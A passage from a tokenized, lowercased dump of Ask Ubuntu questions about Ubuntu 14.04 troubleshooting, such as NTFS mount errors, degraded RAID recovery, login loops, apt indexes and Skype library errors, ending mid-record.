'/home/feld/.local/share/backintime/password_cache' ** ( process:6409 ) : critical ** : file /build/buildd/indicator-sound-12.10.2+14.04.20140401/obj-x86_64-linux-gnu/src/volume-control.c : line 1775 : uncaught error : gdbus.error : org.freedesktop.dbus.error.invalidargs : no such interface ( g-dbus-error-quark , 16 ) xlib : extension `` randr '' missing on display `` :15.0 '' . xlib : extension `` randr '' missing on display `` :15.0 '' . xfce4-panel : fatal io error 11 ( resource temporarily unavailable ) on x server :15.0. xfwm4 : fatal io error 11 ( resource temporarily unavailable ) on x server :15.0. xfce4-session : fatal io error 11 ( resource temporarily unavailable ) on x server :15.0. xfdesktop : fatal io error 11 ( resource temporarily unavailable ) on x server :15.0 . ( nm-applet:6424 ) : gdk-warning ** : nm-applet : fatal io error 11 ( resource temporarily unavailable ) on x server :15.0 . thunar : fatal io error 11 ( resource temporarily unavailable ) on x server :15.0. xfce4-volumed : fatal io error 11 ( resource temporarily unavailable ) on x server :15.0 . ** ( zeitgeist-datahub:6374 ) : warning ** : zeitgeist-datahub.vala:229 : unable to get name `` org.gnome.zeitgeist.datahub '' on the bus ! g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . ** ( process:6391 ) : critical ** : service_on_name_lost : assertion 'connection ! = null ' failed ** ( process:6409 ) : critical ** : indicator_sound_service_name_lost : assertion 'connection ! = null ' failed g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . g_dbus_connection_real_closed : remote peer vanished with error : underlying giostream returned 0 bytes on an async read ( g-io-error-quark , 0 ) . exiting . ( process:6409 ) : glib-gobject-critical ** : g_object_unref : assertion 'g_is_object ( object ) ' failed thank you in advance..
519051	unable to access drivers in ubuntu 14.04	am using ubuntu 14.04 and win 8 . whene ever i tried to access my drivers ( d , e , f etc ) am getting an error message like this ... . ! unable to access â84 gb volumeâ error mounting /dev/sda6 at /media/user/0676d25576d24559 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda6 '' `` /media/user/0676d25576d24559 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda6 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . i have already turned of the fast restarting option in windows 8 . but still getting the same error message . kindly suggest an effective solution to solve this issue permanently ! plz ...
519054	how to compress syslog-ng 's network link , now that zlib is disabled in openssl ?	in our servers infrastructure , for logging , we use a client/server setup , using syslog-ng , and stunnel as a mean of compression at the network level , through zlib at the ssl layer ( syslog-ng does n't support over the wire compression on the ose edition - they lie on their website ) . upon installing ubuntu 14.04 , i 've found that the 1.0.1f-1ubuntu1 version of openssl entirely disabled compression , which makes the stunnel layer pointless , and leaves the infrastructure without network-level compression ( which is crucial ) . is there any suggestion on how to cleanly work this around ? i have a few thoughts : given the openssl developments , i do n't think it would be safe to downgrade given that the pace of security fixes increased , it would n't be feasible to build the package manually i do n't know any alternative for compressing the network connection of syslog-ng . is it expected for openssl to re-enable the ( zlib ) compression ?
519056	how to get back a missing network menu in ubuntu14.04 ?	i am using ubuntu14.04 . network menu in my global menu bar has disappeared.how do i get this menu item back ? results of running nm-applet nm-applet-message : using fallback from indicator to gtkstatusicon ( nm-applet:3516 ) : nm-applet-warning ** : could not find shellversion property on org.gnome.shell after 5 tries ^cnm-applet-message : pid 0 ( we are 3516 ) sent signal 2 , shutting down ... ( nm-applet:3516 ) : glib-critical ** : source id 101 was not found when attempting to remove it results of running killall nm-applet & & setsid nm-applet nm-applet-message : using fallback from indicator to gtkstatusicon ( nm-applet:3647 ) : nm-applet-warning ** : could not find shellversion property on org.gnome.shell results of running `setsid compiz -- replace & & setsid unity` error 2014-09-03 08:55:06 unity.glib.dbus.server glibdbusserver.cpp:524 dbus name lost 'org.gnome.shell' error 2014-09-03 08:55:06 unity.glib.dbus.server glibdbusserver.cpp:524 dbus name lost 'com.canonical.unity' please anyone help me .
519058	extra raid array keeping disks busy	i have a software raid-5 with 5 disks ( seagate st31500341as ) . smart was saying that one was at risk of imminent failure . i replaced it with a new disk , also a 1500gb seagate . the array would n't start in degraded mode , and any command from mdadm would fail saying that the device was busy . based on http : //ubuntuforums.org/showthread.php ? t=854528 i ran sudo mdadm -- assemble -- run -- force /dev/md0 /dev/sd [ bdef ] 1 however , after that this is what i 'm getting from cat /proc/mdstat : personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md126 : inactive sde1 [ 1 ] 1465135865 blocks super 1.2 md127 : inactive sdd1 [ 6 ] sdb1 [ 5 ] sdf1 [ 0 ] 4395407347 blocks super 1.2 i tried to remove the bogus md126 so it would release my sde1 disk : sudo mdadm -- stop /dev/md126 mdadm : stopped /dev/md126 i also stopped md127 , and now it seems to be able to rebuild : servy : ~ > sudo mdadm -- assemble -- run -- force /dev/md127 /dev/sd [ bcdef ] 1 mdadm : forcing event count in /dev/sde1 ( 1 ) from 144553 upto 144564 mdadm : clearing faulty flag for device 2 in /dev/md127 for /dev/sde1 mdadm : marking array /dev/md127 as 'clean' mdadm : /dev/md127 has been started with 4 drives ( out of 5 ) . ok , so now it 's starting in degraded mode and i 'm getting somewhere . i 'm trying to mount it so i can copy the data over to another computer ( i have a backup of the really important stuff , but it 's got a bunch of ( legal ) rips that i do n't want to re-rip . i try mounting from the disk utility and i get error mounting volume an error occurred while performing an operation on `` servydata '' ( whole-disk volume on 6.0 tb raid-5 array ) : filesystem driver not installed details : error mountin : mount : wrong fs type , bad option , bad superblock on /dev/md127 output from mdadm -- detail /dev/md127 /dev/md127 : version : 1.2 creation time : fri oct 1 20:52:08 2010 raid level : raid5 array size : 5860542464 ( 5589.05 gib 6001.20 gb ) used dev size : 1465135616 ( 1397.26 gib 1500.30 gb ) raid devices : 5 total devices : 4 persistence : superblock is persistent intent bitmap : internal update time : tue sep 2 00:39:07 2014 state : active , failed active devices : 3 working devices : 3 failed devices : 1 spare devices : 0 layout : left-symmetric chunk size : 512k name : : servyraid uuid : 86456488 : b308a12c:6e90dab0:4b5efa82 events : 144567 number major minor raiddevice state 0 8 81 0 active sync /dev/sdf1 1 0 0 1 removed 6 8 49 2 active sync /dev/sdd1 3 0 0 3 removed 5 8 17 4 active sync /dev/sdb1 1 8 65 - faulty spare /dev/sde1 from sudo fdisk -l : disk /dev/md127 : 6001.2 gb , 6001195483136 bytes 2 heads , 4 sectors/track , 1465135616 cylinders , total 11721084928 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 524288 bytes / 2097152 bytes disk identifier : 0x00000000 disk /dev/md127 does n't contain a valid partition table from dmesg | tail servy : ~ > dmesg | tail [ 523326.886608 ] buffer i/o error on device md127 , logical block 1465135600 [ 523326.886644 ] buffer i/o error on device md127 , logical block 1465135600 [ 523326.886693 ] buffer i/o error on device md127 , logical block 1465135614 [ 523326.886724 ] buffer i/o error on device md127 , logical block 1465135614 [ 523326.915492 ] buffer i/o error on device md127 , logical block 1465135615 [ 523326.915529 ] buffer i/o error on device md127 , logical block 1465135615 [ 523326.915711 ] buffer i/o error on device md127 , logical block 1465135615 [ 523326.915751 ] buffer i/o error on device md127 , logical block 1465135615 [ 523326.915788 ] buffer i/o error on device md127 , logical block 1465135615 [ 523326.915824 ] buffer i/o error on device md127 , logical block 1465135615 ugh i 'm pretty sure that i 've got multiple disk failures . it looks like 3 disks are still good though . if i could just mount it in degraded mode i could get my data off ... any hints ?
519059	problem in getting gui after updated to 14.04	i am using dual boot . my ubuntu version was 11.10 initially , upgraded to 12.04 lts by upgrading using the alternate cd/dvd found here it was successful , after that i choose partial upgrade through unity gui and left it for updating the system , after upgrade restarted , but the file system was unable to mount , it gives error . mounted the file system and restarted again , it shows the gui screen where my user name is displayed and asked for password , but in this screen still it shows ubuntu 12.04 lts , i double checked in the terminal window , there it shows ubuntu 14.04 lts . after entering the password i am getting a black screen with only the mouse pointer . i tried many other gui as suggested by this q/a site and other sites but nothing worked till . installed & tried below : lubuntu xubuntu kubuntu gnome now there are many options showing in the login screen like gnome gnome flashback ( compiz ) gnome flashback ( metacity ) kde plasma workspace lubuntu lubuntu netbook openbox ubuntu xfce session xubuntu session fail safe i tried to login using all above gui 's but nothing giving me a fruitful result . when i use openbox it gives gray screen with mouse pointer , right click of the mouse gives shortcut menu , in the menu it gives an option to browser , i choose that option and it opened the chromium browser , i can browse the net , this question i am submitting through that only . sometime there is a popup window appearing saying that system program problem detected . do you want to report the problem now failsafe option opened the gui terminal window . what i have to do for getting the gui , the bad part is i could not use a usb boot , since this is an old dell box , the bios does not support usb boot , no dvd drive . appreciate community help to resolve this issue .
519060	ubuntu 14.04.1 error running vmware `` before you can run vmware , several modules must be compiled and loaded in running kernal ''	hi guys recently i 'd installed ubuntu 14.04.1 64 bit version.i 'm trying to install vmware 10 workstation in my ubuntu 64 bit . whenever i start vmware workstation i 'm getting a prompt `` before you can run vmware , several modules must be compiled and loaded in running kernal '' so i 'd tried to install it , but it is throwing some error.then i googled out about this problem , i got these commands '' sudo vmware-modconfig -- console -- install-all '' '' sudo apt-get install build-essential `` it didnt worked for me , then i tried to install patch for it . https : //communities.vmware.com/thread/432897 but still i 'm getting same problem , but after running these commands i found that virtual device network -- -- - > is having some error running depmod -- -- -- -- -- -- - > got installed properly starting vmware service -- -- > is having error please help me out .
519063	how to reformat my sd card ?	i have a micro sd card ( /dev/mmcblk0 ) with one partition on it ( /dev/mmcblk0p1 ) . there is a btrfs filesystem on it , that wo n't mount . when i insert it , i get an error message on the desktop , saying : error mounting /dev/mmcblk0p1 at /media/franck/mysdcard : command-line `mount -t `` btrfs '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/mmcblk0p1 '' `` /media/franck/mysdcard '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/mmcblk0p1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so so i want to erase the disk , re-partition it and reformat to a new fs ( probably ext4 ) . my problem is that i can not do it . fdisk as well as gparted try to do it , and then fail to read again the partition table : $ sudo parted /dev/mmcblk0 gnu parted 2.3 using /dev/mmcblk0 welcome to gnu parted ! type 'help ' to view a list of commands . ( parted ) print model : sd sd64g ( sd/mmc ) disk /dev/mmcblk0 : 63.4gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 16.8mb 62.4gb 62.4gb primary btrfs ( parted ) rm 1 ( parted ) print error : /dev/mmcblk0 : unrecognised disk label if i remove and re-insert the device , the old partition and fs are still here . i suspect gvfs is holding a lock on the device , preventing any write on it : $ sudo lsof /dev/mmcblk0 lsof : warning : ca n't stat ( ) fuse.gvfsd-fuse file system /run/user/1000/gvfs output information may be incomplete . so , is there a way to erase my disk ?
519066	where are the apt indexes stored and can they be removed ?	i am performing an apt-get update prior to installing some packages : get:1 http : //archive.ubuntu.com trusty release.gpg [ 933 b ] get:2 http : //archive.ubuntu.com trusty-updates release.gpg [ 933 b ] ... ... get:23 http : //archive.ubuntu.com trusty-security/restricted amd64 packages [ 40 b ] get:24 http : //archive.ubuntu.com trusty-security/universe amd64 packages [ 58.0 kb ] fetched 20.0 mb in 2min 57s ( 113 kb/s ) as can be seen above , apt-get has fetched 20.0 mb of indexes . after the apt-get update and the apt-get install mypackage , i would like to clean up all caches to minimise the disk space used . question 1 : where are the apt package indexes stored on the file system ? question 2 : how can i safely remove the indexes ?
519068	why version numbers like 10.04 - 12.04 - 14.04	i 've got a question from a ubuntu user why ubuntu is using version numbering like 10.04 , 12.04 and 14.04 ? does anyone know the reason for this ? could n't find this online ..
519070	connecting an android device	i have a samsung galaxy s4 that i have no problem connecting to my ubuntu 14.04 laptop . i have another android device ( a prestigio multipad 7.0 plus ) that ubuntu does n't see at all , but windows 7.0 does . what could be the problem ? thanks .
519073	why is wifi strength low on ubuntu 14.04 but higher on windows 7 ?	i tried this experiment with the same computer at the same times of the day . i sat at a fixed distance from a university router near me an measured and internet speed and wi-fi strength in both ubuntu 14.04 and windows 7 . i find that it is much slower on ubuntu 14.04 than windows 7 . the signal strength is also much lower on ubuntu . why is this ? also note that there no were speed differences on a wired connection ( lan network ) .
519074	how can i remove a single temporary key mapping without resetting the entire keymap ?	so i saw this question the other day . the user 's k key was broken and they wanted to map it to right-shift . a good answer popped up and i thought i 'd test it to see if it worked . i ran : xmodmap -e `` keycode 62 = k '' i did this under the understanding that i never use right-shift for anything . it turns out i was completely wrong . i use it all day long . i 've been filling up documents , corrupting commands , even almost deleting the wrong things ( with right-shift+delete ) . it 's been a roller-coaster of emotions , but now i want it to go away . i 'm sorry universe . i know i could reboot or even just restart x but i have a load of things running and work to do . can i just remove the mapping that xmodmap has created so that right-shift is just right-shift ? in this case it 's just a single mapping ( so etcher sketch approaches will work for me ) but assume i have other mappings that i want to keep .
519078	biometric enrollment	i am interested in developing a match-on-card logon functionality ( biometric enrollment ) for users on ubuntu . i 've searched through pam modules , in ubuntu software center , and with google , and found nothing that would help me . the scenario is next : a smart card reader with fingerprint scanner is connected to the computer . user 's fingerprint is stored on the smart card , not on the computer . so , when user inserts his card into the card reader , he also scans his fingerprint . reader is supposed to compare the given fingerprint with the fingerprint on the card . if they match , user then has to enter his pin on ubuntu login screen . is there a pam module that does this , or do i have to write my own module ? also , where to start with writing pam module , if that is necessary ? or , is there some other module , or library that make this functionality possible ? i have also bumped into bioapi , but there is no explanation , or docs that i have found , that explains how to implement moc on ubuntu using pam .
519081	setting a theme and remove boot entries for refind	please keep in mind : i am still learning : / so you may have to dumb down your answer for me . i am not that new but i have been using linux for only a year or so . so i found this beautiful theme for refind that i wan na set but i have zero clue how to apply it . to add the theme , there are just 3 basic steps . copy the next-theme folder to your refind folder ( e.g . move it to `` macintosh hd/efi/refind/next-theme '' ) open your refind.conf file in your refind folder using textedit ( e.g . `` macintosh hd/efi/refind/refind.conf '' ) and add the following line ( without quotation marks ) `` include next-theme/theme.conf '' open the theme 's configuration file using textedit ( e.g . `` macintosh hd/efi/refind/next-theme/theme.conf '' ) and set the background to use the appropriate resolution file by changing the banner flag . ( e.g . for a 1440x900 native resolution , you 'd change it to `` banner next-theme/background_900.png '' [ without quotation marks ] ) i was only able to get pass step one . the rest just makes no sense . i have the the folder located in s : \efi\refind\next-theme and i am using windows 8.1 pro ( uefi based ) . how do i even set the theme . because i am so close to a beautiful professional dual-boot . looking forward to any answers i can get . : ) where i got the theme : http : //sdbinwiiexe.deviantart.com/art/refind-next-theme-407754566 guide i used to install it : http : //www.rodsbooks.com/refind/installing.html # windows also does anyone know how to remove the extra entries of ubuntu ? i have like three different boot entries for some reason .
519082	how to install libre office without gui	i 'm using python and open document files to generate document from crm then to convert them into pdf format . in this configuration libre office is running as a service . that works perfectly on my desktop development computer without any problem . the production environment will be a 12.04 server without gui and i do n't want to be obliged to install gnome or kde . is there a way to have some kind of core installation of libre office onto a server without gui ?
519083	computer freezes when playing youtube video in chrome	i have got a computer with fresh 14.04 installation . whenever i open a youtube video in chrome it plays for a minute or so , and the the machine freezes . the only way out of it is a hard reset . i have had a short look into dmesg and syslog but nothing caught my eye . any clue in which log file should i look for an answer ? i have tried firefox , and works fine there .
519085	unsupportedclassversionerror with openjdk 1.6 and mysql	using ubuntu 13.10 on virtual server hosted by ovh ( france ) , server version : apache/2.4.6 ( ubuntu ) , openjdk runtime environment ( icedtea6 1.13.3 ) openjdk 64-bit server vm ( build 23.25-b01 , mixed mode ) , tomcat 6 , and mysql 5.5.37-0ubuntu0.13.10.1 . when trying to connect to mysql from a java class , i get this : javax.servlet.servletexception : java.lang.unsupportedclassversionerror : com/mysql/jdbc/driver : unsupported major.minor version 51.0 i have mysql-connector-java-5.1.25.jar in both /usr/share/java and /usr/share/tomcat6/lib . what am i missing ? should i look for a previous version of the mysql-connector-java file ? if yes , which version would you recommend ? are there any known compatibility issues between openjdk and mysql ?
519086	noise when scrolling in chrome:	when i scroll with the mouse scroll or chrome 's scroll line there is strange not quiet but not loud sound from the speakers , when i stop my sound the scrolling sound continues . anyone have similar problems ? i am with xubuntu 14.04.1 .
519087	how to export a tomcat project to ubuntu	i implemented a tomcat project on mac os . then i would like to export the project to ubuntu 12.04 and deploy it . apache2 , tomcat6 and other related packages have been installed to ubuntu . how can i do it smoothly ?
519088	has anybody got access to a h264-stream of an ip-cam over simplecv ?	i wonder if it 's possible to get access of the h264-encoded mainstream of my hikvision ip-cam ds-2cd2032-i over simplecv . the h264-stream i got in the browser is rtsp : //192.168.1.199:554/isapi/streaming/channels/101 ? auth=ywrtaw46mtizndu= simplecv is a python wrapper for opencv ( a computer-vision package ) .
519095	how to call using a synthetic voice in skype	my goal is to use a synthetic voice in a skype call . this could be used in a scenario such as being in two meetings at once ( one local , one remote ) and not being able to speak out loud ( in the local meeting ) . my current attempt is to use pulseaudio volume control ( pavucontrol ) to set the monitor audio of some headphones as an input for skype , which is recognised by pulseaudio volume control as a recording program . i then can use festival to general the synthetic voice . this does work , but the sound produced in the remote meeting then immediately loops back to me , into the monitor audio stream of the headphones and then back into skype as an input ! so , it 's an echo problem . i need something more direct . how could i pipe the audio of the synthetic voice into skype as an input directly ?
519101	clipboards mess : chrome/terminals/vmwareplayer	i 'm unfamilliar with the different clipboards available in linux and how they work , but something strange happens , and there may be a way to resolve this : when i highlight text in my terminal ( terminator ) i can paste it in the guest os of vmware player ( windows 7 ) when i highlight text in google chrome chrome , i can paste it with the mouse middle boutton into my terminal but highlighting text in chrome does n't affect the guest os clipboard content . as far as i understand , linux has two clipboards : the `` ctrl+c/v '' one and the highlight/middlebutton ( mouse ) one . how can i allow the mouse clipboard to be the same wether i highlight text from my browser or my terminal , and thus to transfer it to my guest os ' clipboard ?
519102	how to lock screen when mouse is moved to right-bottom corner ?	i 'd like to lock the screen when i move my mouse to the bottom-right corner . is there a compiz-configuration for that task ? i could not find anything in the compizconfig-settings-manager and system settings .
519104	14.04 - laptop screen goes blank when lid shut	i 'll be totally honest , i have googled this question ... i have read responses ... but i 'm still pretty confused ... anyway ... so , anyway , i want to hook up my laptop with hdmi to my tv ... that part works ( though ... i will need to adjust the overscan settings ... but that 's another story ) and i want to be able to shut the laptop lid , while i lay in bed with a wireless keyboard and mouse navigating ... however when i close the lid both the laptop screen and tv both go black . i have changed the power options to close lid do nothing , and i went into the brightness settings and adjusted those settings as well ( forget what at the moment ... typing this from my windows machine ) so , how do i get my laptop not to do this ? thinkpad sl510 intel graphics
519105	amule 2.3.1 immediate crash after start	i installed amule 2.3.1 and was able to have it up and running for a while . after that i closed and restarted for ip range updates and it just crashed immediately after starting up . i tried to uninstall and install it back but it 's still the same . i have started using lubuntu yesterday on my eee pc asus 1005ha . as i understand there should n't be much of a difference in this matter whether it 's ubuntu or lubuntu . thanks !
519107	wrong mount point for internal ssd	i am having a problem with mounting an internal ssd . for some reason the mounting point is chosen as /media/user/data instead of , as specified in /etc/fstab , /mnt/data . the according line in /etc/fstab goes as follows : uuid= '' 064ced5e-19c1-43d1-876f-3de0c115b65e '' /mnt/data ext4 users , noauto , exec , rw , async , dev 0 0 i am using ubuntu 14.04 lts 64bit . any help would be greatly appreciated .
519108	skype : error while loading shared libraries : libstdc++.so.6 : wrong elf class : elfclass64	have a problem with my skype on my kubuntu 14.04 x64 . skype do not start with message `` skype : error while loading shared libraries : libstdc++.so.6 : wrong elf class : elfclass64 '' . it 's just a pain ... i have a backup of my system . when i do rollback then all works fine , but after some time past ( 1-2 weeks ) skype will not run with the message above . please , if anyone have a solution , post it here . thanks a lot in advance !
519109	how to boot a live-system with proprietary ati drivers / fglrx ?	is it possible to boot a live system which is using the proprietary ati drivers ? thanks !
519111	no sound on gateway ne56r 64-bit	i have a gateway ne56r and sometimes the sound just does n't work when i start up the computer . also , when i first turn on my computer and ubuntu begins to boot , i get messages saying stuff . i think i just need to reinstall my drivers . how can i install drivers for my sound and how can i make sure that driver is enabled ? i do n't want to install a sound driver just to notice that my sound is using a different driver on my computer . i have noticed that the sound does work just fine before i log in . also , on startup of my computer , at the black boot screen , i get a few errors : drm module has bad taint , not creating trace events i915 module has bad taint , not creating trace events snd_hda_controller module has bad taint , not creating trace events snd_hda_codec module has bad taint , not creating trace events
519115	log in loops again for a particular user	i was logging into my ubuntu machine till last night . today i had an error unknown group id error for the group i was in and also the uid . but i had no errors till the last night . i lost my sudo access too . i can ssh into my machine and account but when i log in to through gui i get a blank screen and then i added the group id to /etc/group . i ca n't login after editing them . karthik.singaravelan is my username here . here are the /etc/group and /etc/passwd files root : x:0 : karthik.singaravelan daemon : x:1 : bin : x:2 : sys : x:3 : adm : x:4 : aspire tty : x:5 : disk : x:6 : lp : x:7 : mail : x:8 : news : x:9 : uucp : x:10 : man : x:12 : proxy : x:13 : kmem : x:15 : dialout : x:20 : fax : x:21 : voice : x:22 : cdrom : x:24 : aspire floppy : x:25 : tape : x:26 : sudo : x:27 : aspire audio : x:29 : pulse dip : x:30 : aspire www-data : x:33 : backup : x:34 : operator : x:37 : list : x:38 : irc : x:39 : src : x:40 : gnats : x:41 : shadow : x:42 : utmp : x:43 : video : x:44 : sasl : x:45 : plugdev : x:46 : aspire staff : x:50 : games : x:60 : users : x:100 : nogroup : x:65534 : libuuid : x:101 : crontab : x:102 : syslog : x:103 : fuse : x:104 : messagebus : x:105 : bluetooth : x:106 : scanner : x:107 : colord : x:108 : lpadmin : x:109 : aspire ssl-cert : x:110 : lightdm : x:111 : nopasswdlogin : x:112 : netdev : x:113 : whoopsie : x:114 : mlocate : x:115 : ssh : x:116 : avahi-autoipd : x:117 : avahi : x:118 : pulse : x:119 : pulse-access : x:120 : utempter : x:121 : rtkit : x:122 : saned : x:123 : aspire : x:1000 : sambashare : x:124 : aspire mysql : x:125 : rabbitmq : x:126 : mongodb : x:127 : mongodb memcache : x:128 : tomcat6 : x:129 : karthik.singaravelan : x:1001 : /etc/passwd root : x:0:0 : root : /root : /bin/bash daemon : x:1:1 : daemon : /usr/sbin : /bin/sh bin : x:2:2 : bin : /bin : /bin/sh sys : x:3:3 : sys : /dev : /bin/sh sync : x:4:65534 : sync : /bin : /bin/sync games : x:5:60 : games : /usr/games : /bin/sh man : x:6:12 : man : /var/cache/man : /bin/sh lp : x:7:7 : lp : /var/spool/lpd : /bin/sh mail : x:8:8 : mail : /var/mail : /bin/sh news : x:9:9 : news : /var/spool/news : /bin/sh uucp : x:10:10 : uucp : /var/spool/uucp : /bin/sh proxy : x:13:13 : proxy : /bin : /bin/sh www-data : x:33:33 : www-data : /var/www : /bin/sh backup : x:34:34 : backup : /var/backups : /bin/sh list : x:38:38 : mailing list manager : /var/list : /bin/sh irc : x:39:39 : ircd : /var/run/ircd : /bin/sh gnats : x:41:41 : gnats bug-reporting system ( admin ) : /var/lib/gnats : /bin/sh nobody : x:65534:65534 : nobody : /nonexistent : /bin/sh libuuid : x:100:101 : :/var/lib/libuuid : /bin/sh syslog : x:101:103 : :/home/syslog : /bin/false messagebus : x:102:105 : :/var/run/dbus : /bin/false colord : x:103:108 : colord colour management daemon , , , :/var/lib/colord : /bin/false lightdm : x:104:111 : light display manager : /var/lib/lightdm : /bin/false whoopsie : x:105:114 : :/nonexistent : /bin/false avahi-autoipd : x:106:117 : avahi autoip daemon , , , :/var/lib/avahi-autoipd : /bin/false avahi : x:107:118 : avahi mdns daemon , , , :/var/run/avahi-daemon : /bin/false usbmux : x:108:46 : usbmux daemon , , , :/home/usbmux : /bin/false kernoops : x:109:65534 : kernel oops tracking daemon , , , :/ : /bin/false pulse : x:110:119 : pulseaudio daemon , , , :/var/run/pulse : /bin/false rtkit : x:111:122 : realtimekit , , , :/proc : /bin/false speech-dispatcher : x:112:29 : speech dispatcher , , , :/var/run/speech-dispatcher : /bin/sh hplip : x:113:7 : hplip system user , , , :/var/run/hplip : /bin/false saned : x:114:123 : :/home/saned : /bin/false aspire : x:1000:1000 : aspire , , , :/home/aspire : /bin/bash sshd : x:115:65534 : :/var/run/sshd : /usr/sbin/nologin mysql : x:116:125 : mysql server , , , :/nonexistent : /bin/false rabbitmq : x:117:126 : rabbitmq messaging server , , , :/var/lib/rabbitmq : /bin/false mongodb : x:118:65534 : :/home/mongodb : /bin/false memcache : x:119:128 : memcached , , , :/nonexistent : /bin/false tomcat6 : x:120:129 : :/usr/share/tomcat6 : /bin/false karthik.singaravelan : x:1001:1001 : :/home/karthik.singaravelan : /bin/sh output of id karthik.singaravelan uid=1001 ( karthik.singaravelan ) gid=1001 ( karthik.singaravelan ) groups=1001 ( karthik.singaravelan ) ,0 ( root ) ,1352140539 ( power^users ) ,1352554700 ( linux ) ,1352139265 ( domain^users ) is there any error with the config files that lets me not to log in ? other users can log in from my machine and i can log in from others machines . whenever i press enter to login it goes black and returns to the screen . kindly help me on this issue .
519116	which file specify active of ack ?	using mptcp kernel we like to realize multi-ack systeam . so we need to know which file is part of ack . is there anyone who know that which file specify active of ack . thanks to read this !
519117	how do i erase ubuntu 14.04 lts from my laptop ?	ubuntu 14.04 lts is the only os on my laptop . i have spent alot of time researching on how to format the drive along with ubuntu os . kindly help me do this .
519120	what 's the status of encfs ?	is the encfs project no longer maintained ? it seems the last update 1.7.4 was released on november 18 2010 . in a security audit several weaknesses have been identified , but no updates have since been issued . should encfs still be used ? if not , why is it in the standard repositories of ubuntu ?
519123	how do i discover my socket type ?	i want to upgrade my cpu , but ubuntu 's `` about this computer '' window only gives me `` intel® core™ i3 cpu 530 @ 2.93ghz × 4 '' , so no information on the connector/socket type . so far , i 've tried the following methods : running x86info -a and looking for any information on `` connector type '' ( there was no such line , and x86info actually guessed my cpu as an i7 ) ; running dmidecode -t 4 showed socket designation : cpu 1 , which is not useful running cat proc/cpuinfo also shows no information about my socket type . from research and eyeballing , i guess i 'm dealing with a clarkdale i3 , so the socket would be lga 1156 . however , i 'm still looking for a software confirmation before i commit my money . related question : http : //serverfault.com/q/74658
519124	ubuntu refuses to shut down but screen is black	i run ubuntu 12.04 lts on a laptop ( asus altec lansing ) . this morning i wanted to shut down my laptop . the screen is black now but i noticed it is not shut down at all even if i removed the power supply from it . i kept my finger pushing on the `` shut down '' button next to its keyboard but it refuses to shut down . now the temperature of my laptop increases and it is summer here in france . please what can i do to shut it down ? thank you for your help in advance
519129	falvors of linux which to use	i am new to linux and i came to know about flavours of linux and bit i am confused whats is it exactly about . if anyone can please guide me through this . is there any stable version than ubuntu or its all same only with name change . any advantages over ubuntu regarding software update , drivers , ui , etc please guide thanx
519130	blocking http requests without host header using mod_security2	in my apache configuration , i want to allow only host header based vhosts . that is , i 'd like to block any traffic by ip address only . i have mod_security2 installed , but i am only using the default rule set . is mod_security2 the best place to configure this , and if so , how ? apache 2.4.7 , ubuntu 14.04 , php 5.5.9
519131	is softlinks and hardlinks are somewhat related to mutable and immutable objects ( in java ) in any sense ?	while reading about linux , i got the following : suppose that file1 already exists . a hard link , called file2 , is created with the command : $ ln file1 file2 note that two files now appear to exist . however , a closer inspection of the file listing shows that this is not quite true . $ ls -li file1 file2 the -i option to ls prints out in the first column the inode number , which is a unique quantity for each file object . this field is the same for both of these files ; what is really going on here is that it is only one file but it has more than one name associated with it , as is indicated by the 3 that appears in the ls output . thus , there already was another object linked to file1 before the command was executed . hard links are very useful and they save space , but you have to be careful with their use , sometimes in subtle ways . for one thing if you remove either file1 or file2 in the example on the previous screen , the inode object ( and the remaining file name ) will remain , which might be undesirable as it may lead to subtle errors later if you recreate a file of that name . i am not getting the notion of file object as stated above as unix has been made purely in c ( correct me if i am wrong ) . is it somewhat similar to mutable and immutable classes in java ?
519133	create ubuntu 14.04 system image and install on other machine	i have ubuntu 14.04 ( 64 bit ) installed in my laptop ( core i5 , 6gb ram ) and there are several software installed like r , octave etc . i want to create a system image and use that image to install ubuntu in another laptop of same configuration . is it possible ?
519135	when i want to install anything in ubuntu software center or through sudo apt-get , i am facing issues	my problem is exactly same as stated at the link ubuntu software center not working ; says the package catalog needs repair though according to the solution provided at that place does not work for me , i followed the approach as try sudo apt-get update to update your package list . then sudo apt-get autoclean to clean up any partial packages . then sudo apt-get clean to clean up the apt cache . sudo apt-get autoremove will clean up any unneeded dependencies . if while doing this you can identify the broken package this code will very forcefully remove it . sudo dpkg -- remove -force -- force-remove-reinstreq package name change package name to the real name of course . but on doing the final command i got following response sudo dpkg -- remove -force -- force-remove-reinstreq pidgin response : dpkg : error : conflicting actions -f ( -- field ) and -r ( -- remove ) type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; for reference : after following the above process , on installing the python i am getting response like this sudo apt-get install python response : reading package lists ... done building dependency tree reading state information ... done python is already the newest version . you might want to run 'apt-get -f install ' to correct these : the following 